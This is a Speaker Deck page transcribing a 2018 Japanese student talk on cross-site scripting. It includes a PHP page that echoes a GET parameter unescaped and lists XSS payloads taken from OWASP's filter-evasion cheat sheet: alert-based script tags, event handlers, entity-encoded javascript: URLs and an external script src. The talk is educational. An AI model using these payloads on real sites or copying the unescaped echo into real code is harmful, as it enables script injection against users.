Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

49116ff34041caf0476b170ab193ebc5?s=47 Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.1k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

49116ff34041caf0476b170ab193ebc5?s=128

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
150
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
2
250
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
1
190
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
1
87
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
91
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
190
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
270
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
26

Other Decks in Technology

See All in Technology
Dc20c893cac0daddd607dfc9a5855d27?s=48 amarelo_n24
0
400
Cb06c9369832b0dcd18f10f4ee41c944?s=48 aaaaayako
0
160
Ef779e9bc420affeb93b274cba74ef7c?s=48 hageyahhoo
3
1.6k
532348a1aba5a909e283624c3d2a9a95?s=48 shift_evolve
0
1.5k
Cd931bc05e7cee46b9a950a63e47ba4c?s=48 you
0
160
29fc9602e0ed9cca544d677266dadd68?s=48 hikarut
0
11k
932329c79bc511fdfed22abbd5ec92d2?s=48 rnakamuramartiny
0
3.1k
Cdf97a1b1b132c56582773c3ba09a3a6?s=48 rakus_dev
0
250
79dcb04101764d7bf66f898dd446838e?s=48 tsukubachallenge
0
200
B1dca90d4b3ffd2ccd918774e1ba170d?s=48 hmatsu47
PRO
0
150
Ac734fc32781678475b577944bb5a9ae?s=48 charity
1
640
D9bccbb47eddad3154e3cb7a967ba4bf?s=48 sarah_fooddatabank
0
160

Featured

See All Featured
C86443373fbfe92996aa882d0d7a59f8?s=48 imathis
484
150k
A9a491b0fcbe0fbce3d64063a37add99?s=48 rmw
17
1.3k
2bb923c57a1fdc3a2eb484bb8d565fd2?s=48 ufuk
61
7.4k
Dafc4723e9a1c067796c0fec6f509774?s=48 lemiorhan
634
50k
433acaea1012b25d97ae66da9b998dad?s=48 malarkey
194
9.1k
Be9caeb9d4ef9944d151af909063ed6e?s=48 samlambert
238
10k
1b75d89772b7eea1f6c89fbf362607d9?s=48 moore
129
22k
F383c6a4dc55e331bbe2987b622cee6b?s=48 stephaniewalter
267
11k
812e1705ff0f8bc1bcf18587bde687d5?s=48 62gerente
595
210k
4394ceb8b277f35ee3da7030384efb5d?s=48 davidbonilla
75
3.8k
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
210
20k
A60068bce2e73de3a37ca9d2dbe36092?s=48 bryan
106
12k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron